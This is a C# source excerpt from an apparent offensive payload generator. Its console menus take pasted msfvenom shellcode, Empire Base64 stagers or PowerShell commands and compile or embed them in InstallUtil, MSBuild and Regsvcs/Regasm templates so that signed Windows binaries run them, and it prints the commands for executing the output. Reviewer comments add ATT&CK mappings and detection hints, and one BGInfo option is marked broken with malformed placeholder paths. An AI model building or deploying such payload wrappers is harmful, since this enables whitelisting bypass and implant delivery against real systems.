/// <summary>
/// Interactive console flow for the InstallUtil shellcode template: shows the usage
/// example, reads the pasted msfvenom C# output, asks where to write the result and
/// passes everything to <c>Generators.GeneratePayload</c>.
/// </summary>
/// <remarks>
/// The pasted text is forwarded as-is; nothing in this method validates or parses it.
/// </remarks>
private static void MetaSploit()
{
    // Name offered to the operator when no other output file is chosen.
    const string defaultFileName = "InstallUtilMetasploit.exe";

    Helpers.WriteMetasploitExample();
    Console.WriteLine("Paste in your Metasploit C# payload here");

    // The instruction about pasting the complete msfvenom output is shown in red.
    Console.ForegroundColor = ConsoleColor.Red;
    Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
    Console.ResetColor();
    Console.WriteLine("Press Enter in an empty line to exit...");

    string pastedSource = Helpers.PasteToString();
    string outputPath = Helpers.FileFolderLocation(defaultFileName);

    // "Compile" plus "/unsafe /platform:x86" are handed to the generator unchanged.
    // NOTE(review): these look like C# compiler switches (unsafe code, 32-bit target) - confirm in Generators.
    Generators.GeneratePayload(
        Resources.Template_InstallUtil_Shellcode,
        outputPath,
        pastedSource,
        "Compile",
        "/unsafe /platform:x86",
        null,
        null);

    Console.WriteLine();
    Console.WriteLine("Commands used to execute payload:");

    // NOTE(review): the helper name suggests the output is meant to be run through InstallUtil.exe.
    // For defenders this maps to MITRE ATT&CK T1218.004; InstallUtil.exe loading an assembly from a
    // user-writable path is the usual detection point - confirm against the helper.
    Helpers.WriteInstallUtilPayloadExample(outputPath);
    Helpers.PauseExecution();
}
/// <summary>
/// Interactive console flow for the MSBuild PowerShell template: reads a plain-text
/// PowerShell command, Base64-encodes its UTF-8 bytes and passes the encoded string to
/// <c>Generators.GeneratePayload</c> with the "GenerateFile" action.
/// </summary>
private static void UnencodedPoshCommand()
{
    // Name offered to the operator when no other output file is chosen.
    const string defaultFileName = "MSBuildUnencodedPowerShell.bypass";

    Console.WriteLine("Type in your unencoded PowerShell command");
    Console.WriteLine("");
    Console.WriteLine("Example: Get-service > c:\\test\\file.csv");
    Console.WriteLine("");
    Console.WriteLine("Press Enter in an empty line to exit paste");

    string commandText = Helpers.PasteToString();

    // The command is carried into the template as Base64 of its UTF-8 bytes.
    // NOTE(review): PowerShell's own -EncodedCommand expects UTF-16LE; presumably the template
    // decodes this value itself as UTF-8 - confirm in Template_MSBuild_PowerShell.
    byte[] utf8Bytes = System.Text.Encoding.UTF8.GetBytes(commandText);
    string encodedCommand = System.Convert.ToBase64String(utf8Bytes);

    string outputPath = Helpers.FileFolderLocation(defaultFileName);

    Generators.GeneratePayload(
        Resources.Template_MSBuild_PowerShell,
        outputPath,
        encodedCommand,
        "GenerateFile",
        null,
        null,
        null);

    // NOTE(review): the helper name suggests the file is meant to be built with MSBuild.exe.
    // For defenders this maps to MITRE ATT&CK T1127.001; MSBuild.exe building a project file with an
    // unusual extension outside a developer workflow is the usual detection point - confirm against the helper.
    Helpers.WriteMSBuildPayloadExample(outputPath);
    Helpers.PauseExecution();
}
/// <summary>
/// Interactive console flow for the Regsvcs/Regasm PowerShell template: reads a Base64
/// string, decodes it as UTF-16LE text, rewrites it, re-encodes it as Base64 of UTF-8 and
/// passes the result to <c>Generators.GeneratePayload</c> with the "Compile" action.
/// </summary>
/// <remarks>
/// The decoded text is echoed to the console before it is rewritten.
/// </remarks>
private static void Empire()
{
    // Name offered to the operator when no other output file is chosen.
    const string defaultFileName = "RegsvcsRegasmEmpireStager.dll";

    Helpers.WriteEmpireExample();

    // The instruction to paste only the Base64 string is shown in red.
    Console.ForegroundColor = ConsoleColor.Red;
    Console.WriteLine("Important! -->Only paste the base64 encoded string<--");
    Console.ResetColor();
    Console.WriteLine("Press Enter in an empty line to exit paste");

    string pastedBase64 = Helpers.PasteToString();

    // Decode: Base64 -> bytes -> UTF-16LE string.
    // NOTE(review): Convert.FromBase64String throws FormatException on anything that is not valid
    // Base64, and nothing here catches it, so a bad paste terminates this flow with an exception.
    byte[] decodedBytes = System.Convert.FromBase64String(pastedBase64);
    string decodedScript = Encoding.Unicode.GetString(decodedBytes);
    Console.WriteLine(decodedScript);

    // Every '&' becomes '.'; the original author attributes this to an unspecified bug.
    string rewrittenScript = decodedScript.Replace("&", ".");
    Console.WriteLine();

    // Encode again, this time as Base64 of the UTF-8 bytes (not UTF-16LE as on input).
    byte[] utf8Bytes = Encoding.UTF8.GetBytes(rewrittenScript);
    string reencoded = Convert.ToBase64String(utf8Bytes);
    Console.WriteLine();

    string outputPath = Helpers.FileFolderLocation(defaultFileName);

    // Two earlier variants of this call are disabled in the original source: one added a /r:
    // reference to System.Management.Automation.dll from the GAC, the other a /keyfile:meta.snk
    // switch (with a remark that meta.snk is hard-coded in the template and has to sit in the
    // directory the tool is run from). Only "/unsafe /platform:x86" is passed now.
    Generators.GeneratePayload(
        Resources.Template_RegsvcsRegasm_PowerShell,
        outputPath,
        reencoded,
        "Compile",
        "/unsafe /platform:x86",
        null,
        null);

    // NOTE(review): the helper name suggests the DLL is meant to be registered with regsvcs.exe or
    // regasm.exe. For defenders this maps to MITRE ATT&CK T1218.009; either binary loading a DLL from
    // a user-writable path is the usual detection point - confirm against the helper.
    Helpers.WriteRegsvcsRegasmPayloadExample(outputPath);
    Helpers.PauseExecution();
}
/// <summary>
/// Prints the BGInfo sub-menu, reads one line from the console and handles option "1".
/// </summary>
/// <remarks>
/// Only option "1" has live code. The handlers for "2", "3", "4" and "0"/empty input, and a
/// "NOT IMPLEMENTED YET" banner, exist only as commented-out code in the original source, so
/// any other input returns without doing anything.
/// </remarks>
public static void Menu()
{
    Console.WriteLine("1. Empire Native VBS Stager - BROKEN");
    Console.WriteLine("2. Empire StarFighter");
    Console.WriteLine("3. Metasploit VBSMeter");
    Console.WriteLine("4. Metasploit VBSWebMeter");
    Console.WriteLine("0.Back");

    string selection = Console.ReadLine();
    Console.WriteLine();

    // Everything except "1" (including null at end of input) falls straight through.
    if (selection != "1")
    {
        return;
    }

    // NOTE(review): neither literal is verbatim, so each "\t" is a TAB escape; the arguments are
    // not the backslash-separated paths they appear to be. The menu entry is labelled BROKEN and
    // the values look like test placeholders - confirm the intended paths before changing them.
    // The paste/generate flow that used to follow (PasteToString, FileFolderLocation,
    // GeneratePayload with Template_BGInfo_EmpireNative) is disabled in the original source.
    Generators.GenerateBGIFile("\\test\test", "C:\temp\test.bgi");

    Console.ResetColor();
    Helpers.PauseExecution();
}